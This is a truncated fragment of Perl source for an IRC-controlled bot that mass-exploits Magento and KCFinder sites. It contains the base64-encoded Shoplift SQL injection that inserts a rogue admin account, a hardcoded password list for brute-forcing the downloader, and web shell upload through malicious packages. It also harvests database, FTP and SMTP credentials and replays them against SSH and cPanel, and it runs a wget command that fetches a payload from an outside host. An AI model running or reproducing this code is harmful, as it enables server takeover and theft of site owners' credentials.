"http://".$site."admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; my $fz = &get_content($testsql); my $url = "http://".$site."/admin/index.php"; my $check = &get_content($url); if($check =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $username = "black"; my $password = "panthers"; my $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "login[username]" => $username, "login[password]" => $password, "form_key" => $key ] ); my $res = $response->content; if($res =~ /<span class="price">(.*?)<\/span>/g) { my $price = $1; my $url2 = "http://".$site."/downloader"; my $ua2 = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua2->requests_redirectable(['GET', 'HEAD', 'POST']); $ua2->max_redirect(5); $ua2->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response2 = $ua2->request( POST "$url2", Content_Type => 'form-data', Content => [ "username" => $username, "password" => $password ] ); my $res2 = $response2->content; if($res2 =~ /Log Out/ig || $res2 =~/Return to Admin/ig) { my $filesystem = ($res2 =~ /File_System/ig) ? "Exists" : "Not exists"; my $permission = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; sleep(3); my $m_fs = ($filesystem eq "Exists") ? "9Installed" : "0Not Found"; my $m_perm = ($permission eq "Denied") ? "4Denied" : "9Writable"; #my $out = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; #my $fs = ($res2 =~ /File_System/ig) ? "Installed" : "Not Install"; &msg("$admin","![4SHOPLIFT]! 12".$url." 4<9=4> 12 File_System = $m_fs & Downloader = $m_perm  black panthers![13*]!"); &msg("$channel","![4SHOPLIFT]! 12LOGIN11 [8Success11]12 Balance11 [9 ".$price." 11]12 File_System = $m_fs14 &12 Downloader = $m_perm  ![13*]!"); } } } else { &mageBrute($site, $tastx) } } } &Query("http://".$site.$dirx.$cmswy1); my $sitix = "http://".$site."downloader/index.php"; my $res = &mslAdmin($sitix); if($res =~ /Return to Admin/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } my $satos = "http://".$site.$dirx; my $chick = &Query($satos); if($chick =~ /Password/i) { &msg("$channel","![4X]! Exploiting (8): 14".$site." ![13*]!"); my $res = &mslAdmin($satos); if($res =~ /Dashboard/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirx." ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirx." ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } my $testsql = "http://".$site."admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; my $fz = &get_content($testsql); my $url = "http://".$site."/admin/index.php"; my $check = &get_content($url); if($check =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $username = "black"; my $password = "panthers"; my $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "login[username]" => $username, "login[password]" => $password, "form_key" => $key ] ); my $res = $response->content; if($res =~ /<span class="price">(.*?)<\/span>/g) { my $price = $1; my $url2 = "http://".$site."/downloader"; my $ua2 = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua2->requests_redirectable(['GET', 'HEAD', 'POST']); $ua2->max_redirect(5); $ua2->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response2 = $ua2->request( POST "$url2", Content_Type => 'form-data', Content => [ "username" => $username, "password" => $password ] ); my $res2 = $response2->content; if($res2 =~ /Log Out/ig || $res2 =~/Return to Admin/ig) { my $filesystem = ($res2 =~ /File_System/ig) ? "Exists" : "Not exists"; my $permission = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; sleep(3); my $m_fs = ($filesystem eq "Exists") ? "9Installed" : "0Not Found"; my $m_perm = ($permission eq "Denied") ? "4Denied" : "9Writable"; #my $out = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; #my $fs = ($res2 =~ /File_System/ig) ? "Installed" : "Not Install"; &msg("$admin","![4SHOPLIFT]! 12".$url." 4<9=4> 12 File_System = $m_fs & Downloader = $m_perm  black panthers![13*]!"); &msg("$channel","![4SHOPLIFT]! 12LOGIN11 [8Success11]12 Balance11 [9 ".$price." 11]12 File_System = $m_fs14 &12 Downloader = $m_perm  ![13*]!"); } } } my @bds = ( "/cloud.php?silk", "/js/cloud.php?silk", "/css.php", "/trial.php?silk", "/js/trial.php?silk", "/js/.log.php", "/.log.php", "/xml.php", "/wp-xml.php", "/wp-sign.php", "/skin/heas.php", "/skin/total.php", "/skin/www.php", "/dupal.php", "/js/.x.php", "/semayan.php", "/plug.php", "/kodox.php", "/css.php", "/uk.php", "/tmp.php", "/cmd.php", "/Neko.php", "/extjs.php", "/js/flash/_cache.php", "/js/extjs/_cache.php", "/js/.index.php", "/js/lib/.index.php", "/405.php", "/.libs.php", "/js/405.php", "/js/get.php", "/404.php", "/js/403.php", "/vega.php", "/js/vega.php", "/mage.php", "/js/mage.php", "/skin/mage.php", "/skin/heas.php", "/skin/total.php", "/ngoi.php", "/js/ngoi.php", "/skin/ngoi.php", "/core.php", "/js/core.php", "/logo.php", "/js/logo.php", "/skin/logo.php", "/skin/signature.php", "/skin/feeds.php", "/eX2.php", "/js/eX2.php", "/skin/eX2.php", "/erorr.php", "/feeds.php", "/downloader/support.php", "/skin/error.php", "/skin/upil.php", "/skin/Signedint.php", "/skin/skinmain.php", "/skin/rss.php", "/skin/skinwizard.php", "/updater.php", "/skin/view.php", "/view.php" ); my @result = &backdoorCheck($site,@bds); if($result[0] ne "false") { &msg("$channel","![4SHOPLIFT-SHELL]! [ 4$result[2] 3OK! ]"); &msg("$admin","![7$engine]! [ 11$result[0] OS: $result[1] SAFEMODE:4$result[2] ]"); &msg("$wakil","![7$engine]! [ 11$result[0] OS: $result[1] SAFEMODE:4$result[2] ]"); } } } exit; } } sub download2_xpl() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; ################################################## my $xpl = "mage.tgz"; my %users = ( "burung" => "kuntul16", "stupid" => "stupid48", "indra" => "indra", "cyberindo" => "devil123", "veteran" => "Uzjancok87", "ctrl" => "ctrl", "admin212" => "jandaku", "admin" => "admin", "hydra" => "admin", "policy" => "tempek", "lycoz" => "wew", "dlc" => "dlc", "design" => "web", "system32" => "devil123", "david" => "ala", "super" => "xxx", "forme" => "forme", "Jhones" => "kreator", "gextur" => "web", "akuaja" => "akuaja", "admcoy" => "busuk", "mildnet" => "jandaku", "bisikan" => "bisik", "defaults01" => "defaults0123", "sysmon" => "bichhanh", "system_backup" => "123456" ); ######################################################### my $scn = 1; my $uagent = &getUagent(); if($scn) { my $login = 0; foreach my $k(keys %{users}) { my $loop = 1; my $user = $k; my $pass = $users{$k}; $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new( file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => ["username" => $user,"password" => $pass ] ); sleep(5); my $res = $response->content; if($res =~ /Log Out/ig || $res =~/Return to Admin/ig) { $loop = 0; $login = 1; my $filesystem = ($res =~ /File_System/ig) ? "Exists" : "Not exists"; my $permission = ($res =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; my $magexpl = ($res =~ /Grizzly3_MassEmail/ig) ? 1 : 0; my $magexpl2 = ($res =~ /LibMagen_Ext/ig) ? 1 : 0; my $magexpl3 = ($res =~ /Magento_Mass/ig) ? 1 : 0; sleep(3); my $m_fs = ($filesystem eq "Exists") ? "3Installed" : "14Not Found"; my $m_perm = ($permission eq "Denied") ? "14Denied" : "3Writable"; my $cloud = ($magexpl) ? "9Found" : "14Not Found"; my $msg = "12Cloud: ".$cloud."12 Filesystem: ".$m_fs."12 Permission: ".$m_perm.""; my $msg2 = $url."12 Login:14 ".$user."12 PASS:14 ".$pass." ".$msg.""; &msg("$channel","![4SHOPLIFT]! [ $msg ]"); &msg("$admin","![4SHOPLIFT]! [ 3$msg2 ]"); if(!$magexpl) { if($permission eq "Writable") { my $uploaded = 0; if($res =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $key = $1; my $url2 = "http://".$site."/downloader/index.php?A=connectInstallPackageUpload"; my $res2 = $ua->request( POST "$url2", Content_Type => "form-data", Content => [ "form_key" => $key, "file" => ["$xpl"] ] ); sleep(20); if($res2->is_success) { my $url3 = "http://".$site."/cloud.php?silk"; my $check3 = &get_content($url3); sleep(5); if($check3 =~ /Touched\s*By\s*Silk\s*/ig || $check3 =~ /Uname\s*\:\s*/ig) { my $os = ""; if ($check3 =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne ""){ $uploaded = 1; my $msg = $url3."9 Uname:14 ".$os." "; &msg("$channel","![4SHOPLIFT-SHELL]! [ 3$os ]"); &msg("$admin","![4SHOPLIFT-SHELL]! [ 3$msg ]"); } } } } if(!$uploaded) { &magento_backdoor($site,$chan,$nick,$logo,$engine); } } else { &magento_backdoor($site,$chan,$nick,$logo,$engine); } } ###################################################### elsif(!$magexpl2) { if($permission eq "Writable") { if($res =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $key = $1; my $url22 = "http://".$site."/downloader/index.php?A=connectInstallPackageUpload"; my $res22 = $ua->request( POST "$url22", Content_Type => "form-data", Content => [ "form_key" => $key, "file" => ["$xpl"] ] ); sleep(20); if($res22->is_success) { my $url4 = "http://".$site."/cloud.php?silk"; my $check3 = &get_content($url4); sleep(5); if($check3 =~ /Touched\s*By\s*Silk\s*/ig || $check3 =~ /Uname\s*\:\s*/ig) { my $os = ""; if ($check3 =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne ""){ my $msg = $url4."9 Uname:14 ".$os." "; &msg("$channel","![4SHOPLIFT-SHELL]! [ 3$os ]"); &msg("$admin","![4SHOPLIFT-SHELL]! [ 3$msg ]"); } } } } } } #-----------------------------------------------------------------------------------------------------------------# elsif(!$magexpl3) { if($permission eq "Writable") { if($res =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $key = $1; my $url222 = "http://".$site."/downloader/index.php?A=connectInstallPackageUpload"; my $res222 = $ua->request( POST "$url222", Content_Type => "form-data", Content => [ "form_key" => $key, "file" => ["$xpl"] ] ); sleep(20); if($res2->is_success) { my $url5 = "http://".$site."/cloud.php?silk"; my $check3 = &get_content($url5); sleep(5); if($check3 =~ /Touched\s*By\s*Silk\s*/ig || $check3 =~ /Uname\s*\:\s*/ig) { my $os = ""; if ($check3 =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne ""){ my $msg = $url5."9 Uname:14 ".$os." "; &msg("$channel","![4SHOPLIFT-SHELL]! [ 3$os ]"); &msg("$admin","![4SHOPLIFT-SHELL]! [ 3$msg ]"); } } } } } } ############################################################################################################################################## } if($loop) { sleep(5); } else { last; } } } } sub magento_backdoor { my ($site,$chan,$nick,$logo,$engine) = @_; my @bds = ( "up.php", "2018.php", "2019.php", "Mass.php", "unta.php", "css.php", "/trial.php?silk", "/js/trial.php?silk", "/js/cloud.php?silk", "/js/.log.php", "/.log.php", "/xml.php", "/wp-xml.php", "/wp-sign.php", "/skin/heas.php", "/skin/total.php", "/skin/www.php", "/dupal.php", "/js/.x.php", "/semayan.php", "cloud.php", "/plug.php", "/kodox.php", "/css.php", "/uk.php", "/tmp.php", "/cmd.php", "/Neko.php", "/extjs.php", "/js/flash/_cache.php", "js/extjs/_cache.php", "/js/.index.php", "/js/lib/.index.php", "/405.php", "/js/405.php", "/js/get.php", "/404.php", "/js/403.php", "/vega.php", "/js/vega.php", "/mage.php", "/js/mage.php", "/skin/mage.php", "/ngoi.php", "/js/ngoi.php", "/skin/ngoi.php", "/core.php", "/js/core.php", "/logo.php", "/js/logo.php", "/skin/logo.php", "/skin/signature.php", "/skin/feeds.php", "/eX2.php", "/js/eX2.php", "/skin/eX2.php", "/erorr.php", "/feeds.php", "/skin/error.php", "/skin/upil.php", "/skin/Signedint.php", "/skin/skinmain.php", "/skin/rss.php", "/skin/skinwizard.php", "/updater.php", "/skin/view.php", "/view.php" ); my @bd = &backdoorCheck2($nick,$site,@bds); if($bd[0] ne "false") { if($bd[1] eq "backdoor") { &msg("$channel","![4SHOPLIFT-SHELL]! [ 3$bd[1] ]"); &msg("$admin","![4SHOPLIFT-SHELL]! [ 3$bd[0] ] [ 3$bd[1] ]"); } else { &msg("$channel","![4SHOPLIFT-SHELL]! [ 3$bd[1] ]"); &msg("$admin","![4SHOPLIFT-SHELL]! [ 3$bd[0] ] [ 3$bd[1] ]"); } } } sub magmiin_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $action = "http://".$site."/magmi/conf/magmi.ini"; my $cok =&get_content($action); if ($cok =~ /connectivity/i){ &msg("$channel","![7X]! [12 Checking ] [3 $site ... ]"); if ($cok =~ m/host = "(.*)"/g){$host = $1;} if ($cok =~ m/user = "(.*)"/g){ $user = $1;} if ($cok =~ m/dbname = "(.*?)"/g){$dbname = $1;} if ($cok =~ m/password = "(.*)"/g){$pass = $1;} &mageAuth($site, $host, $user, $pass, $dbname); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $host, $user, $pass, $dbname); &dbConnect($site, $host, $user, $pass, $dbname); } if($user){ &msg("$chanxxx","4http://".$site." 9[+]hostname: 4".$host."9 [+]username: 4".$user." 9[+]password: 4$pass 9[+]dbname: 4".$dbname."");sleep(2); &msg("$channel","4http://".$site." 9[+]hostname: 4".$host."9 [+]username: 4".$user." 9[+]password: 4lol 9[+]dbname: 4".$dbname."");sleep(2); if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = &get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$channel","13$nick dapat colokan FtP *.ini file, Selamatt Yaaa... ^_^ 4<9=".$site."4>"); #&msg("$chan2","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$admin","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$usr." ".$user." [+]password:".$pass.""); } if ($ftplog2 =~ /ftp/) { &msg("$channel","13$nick dapat colokan FtP *.ini file, Selamatt Yaaa... ^_^ 4<9=".$site."4>"); #&msg("$chan2","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$admin","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass.""); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($site,$host,$user,$pass,$dbname,$chanxxx,$engine,$mglogo); &ftp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &cp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); if ($user =~ /_/) { @users = split("_",$user); $user = $users[0]; &ftp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo); sleep(2); &dbi_connect($site,$host,$user,$pass,$dbname,$chanxxx,$engine,$mglogo); sleep(2); &cp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); } } } }else{} } sub dbi_connect () { my $host = $_[0]; my $user = $_[1]; my $pass = $_[2]; my $dbname = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $port = "3306"; my $platform = "mysql"; my $dsn = "dbi:$platform:$dbname:$host:$port"; my $DBIconnect= DBI->connect($dsn,$user,$pass); if ($DBIconnect) { &msg("$channel","![4VULN-DBI]!14 http://".$host." 3Success "); &msg("$admin","$logo4$engine4 http://".$host." |7 ".$user.":".$pass." "); } } sub carismtp() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $logo = $_[4]; my $data = &get_content($url); my $psite = "http://".$site; if ($psite =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; } if ($data =~ m/smtphost/g && $data =~ m/smtppass/g || $data =~ m/ftp_host/g ) { my $smtphost=""; my $smtpport=""; my $smtpuser=""; my $smtppass=""; if ($data =~ m/smtphost = '(.*)';/g) { $smtphost = $1; } if ($data =~ m/smtpport = '(.*)';/g) { $smtpport = $1; } if ($data =~ m/smtpuser = '(.*)';/g) { $smtpuser = $1; } if ($data =~ m/smtppass = '(.*)';/g) { $smtppass = $1; } if ($data =~ m/ftp_host = '(.*)';/g) { $ftp_host = $1; } if ($data =~ m/ftp_port = '(.*)';/g) { $ftp_port = $1; } if ($data =~ m/ftp_user = '(.*)';/g) { $ftp_user = $1; } if ($data =~ m/ftp_pass = '(.*)';/g) { $ftp_pass = $1; } &msg("$channel","$jcelogo(4$engine14) (4SMTP14:4$smtpuser14) (4FTP14:4$ftp_user)"); &msg("$admin","$jcelogo(4$engine14)4 SMTP: $site -14 $smtphost:$smtpport $smtpuser:$smtppass |4 ftp://$site -14 $ftp_host:$ftp_port $ftp_user:$ftp_pass "); sleep(5); &ftp_connect("http://target.com",$host,$ftp_user,$ftp_pass,$chan,$engine); sleep(2); } } sub osss() { my $target=$_[0]; my $re = &query($target); while ($re =~ m/<br>OSTYPE:(.+?)\<br>/g) { $os = $1; } } sub os() { my $url = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $logo = $_[3]; my $nick = $_[4]; my @print; my $target = &get_content($url); if ($target =~ /plaNETWORK/i) { my $safe = ""; my $os = ""; if ($target =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($target =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$channel","$logo4target sent to 12$nick 14$safe $os"); &msg("$nick","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); #&msg("$inject","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); &msg("$admin","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); } return @print; } sub os2() { my $url = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $logo = $_[3]; my $nick = $_[4]; my @print; my $target = &get_content($url); if ($target =~ /plaNETWORK/i) { my $safe = ""; my $os = ""; if ($target =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($target =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$channel","$logo4target sent to 12$nick 14$safe $os"); &msg("$nick","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); #&msg("$inject","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); &msg("$admin","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); #&msg("$chanxxx","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); } return @print; } sub os3() { my $url = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $logo = $_[3]; my $nick = $_[4]; my @print; my $target = &get_content($url); if ($target =~ /plaNETWORK/i) { my $safe = ""; my $os = ""; if ($target =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($target =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$channel","$logo4target sent to 12$nick 14$safe $os"); &msg("$nick","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); #&msg("$inject","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); &msg("$admin","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); #&msg("$chanxxx","$logo4$engine 12sHeLL4 ".$url." 14$safe $os"); } return @print; } ##################### sub ssh_connect { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $success = 1; my $count = 0; #use Net::SSH::Perl; #use Test::SSH; eval{ my $ssh = Test::SSH->new($host,Debug => 0, Timeout => 10); $success = 0 if $ssh->login($user,$pass);sleep(3); $ssh->quit; if ($success == 0) { &msg("$channel","15[SSH ROOT15] 13,1 dapat SSH / ROOT Selamatt Yaaa... ^_^ ");sleep(3); &msg("$admin","15[SSH ROOT15] 4 ".$url." | 7 ".$user." : ".$pass." ");sleep(3); } } } sub ssh_connect2 { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $success = 1; my $count = 0; #use Net::SSH::Perl; #use Test::SSH; my $ssh = Test::SSH::Perl->new($host); $success = 0 if $ssh->login($user, $pass);sleep(3); $ssh->quit; if ($success == 0) { &msg("$channel","15,1[SSH ROOT15] 13,1 dapat SSH / ROOT Selamatt Yaaa... ^_^ ");sleep(3); &msg("$admin","15,1 $engine [SSH ROOT15] 4 ".$url." | 7 ".$user." : ".$pass." ");sleep(3); } } sub cp_connect () { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $count = 0; #my $port = $ports[rand(scalar(@ports))]; #my @ports = ("2082","2083"); #foreach my $port(@ports){ #my $urls = "http://".$host.":".$port; my $urls = "http://".$host.":2082"; my $test = &get_content($urls); if ($test =~ m/<title>cPanel Login<\/title>/i ){ #if ($test =~ /1/ ){ &msg("$channel","![ 11cPanel ] 13Mencoba login cpanel 7$urls ");sleep(3); $authx = encode_base64($user.":".$pass); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-] Can not connect to the host"; print $sock "GET / HTTP/1.1\n"; print $sock "Authorization: Basic $authx\n"; print $sock "Connection: Close\n\n"; read $sock, $answer, 128; if ($answer =~ /Moved/) { &msg("$channel","![ 11cPanel ] 7 cPanel berhasil ditelanjangin ^_^ ");sleep(2); &msg("$admin","15,1 [cPanel 15] 13,1 $host/cpanel / $urls 7,1 $user : $pass ");sleep(2); exit(); } } } sub kcf_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$kcflogo); my $num = scalar(@totexploit); if ($num > 0) { foreach my $site (@totexploit) { $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $path; my $vuln = "http://".$site."kcfinder/upload.php"; my $cekbug = &get_content("http://".$site."kcfinder/browse.php"); #if ($cekbug =~ /browser.uploadURL = \"/) { if ($cekbug =~ /KCFinder:(.*?)/i) { if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my $exp = &kcf_post($vuln,"Filedata","style.php.ndsfx"); if ($exp =~ /kc_Custom\('(.*?)ndsfx'/) { $path = $1; my $shell = "http://".$site.$path."ndsfx"; &kcf_post("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ./style.php.ndsfx");'); sleep(8); &kcf_post2("http".$site); sleep(8); &msg("$channel","![7$engine]! [ 11Checking if payload was send ]");sleep(3); my $check = &get_content($shell."?cek"); &get_all($shell."?cek"); if ($check =~ m/404 Not Found/ig){ &get_content($shell."?cek"); my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [ 0sHeLL 14$safe $os ]"); &msg("$admin","15[4+11$engine15] 11$shell 0SafeMod=$safe $os ");sleep(2); #&msg("$chanxxx","15[4+11$engine15] 11$shell 0SafeMod=$safe $os $uid "); &shellx($chan,$site,$engine,$nick,$logo); sleep(3); } } } exit; } } } } } sub get_all() { my $url = $_[0]; my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout($timot); $ua->agent($useragent); #my $ua = LWP::UserAgent->new(agent => &randomagent()); #$ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res; } sub kcf_post() { my $target = $_[0]; my $code = $_[1]; my $browser = LWP::UserAgent->new; my $res = $browser->post($target,['Filedata'=> ['./style.php.ndsfx' => 'style.php.ndsfx' => 'application/octet-stream']],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub kcf_post2() { my $target = $_[0]; my $code = 